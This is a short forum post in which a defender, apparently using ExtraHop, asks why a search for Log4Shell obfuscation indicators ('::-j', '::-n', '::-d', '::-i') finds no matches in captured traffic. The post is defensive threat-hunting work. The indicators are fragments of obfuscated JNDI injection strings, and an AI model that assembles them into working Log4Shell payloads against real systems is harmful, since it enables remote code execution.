I’m trying to crawl my storage appliance for this specific indicator (::-j, ::-n, ::-d, ::-i) for log4j related traffic.
I understand that ExtraHop has deployed a cloud update to alert us for any log4shell jndi injection attempts. However, due to some reason, all not jndi injection attempt seems to be flagged by the cloud detector. Hence i’m trying to manually query them myself just to be sure.
The search filter, “AnyField ≈ ::-j”, somehow is not able to return me any results that contains specifically ::-j.
Can anyone advise on this please.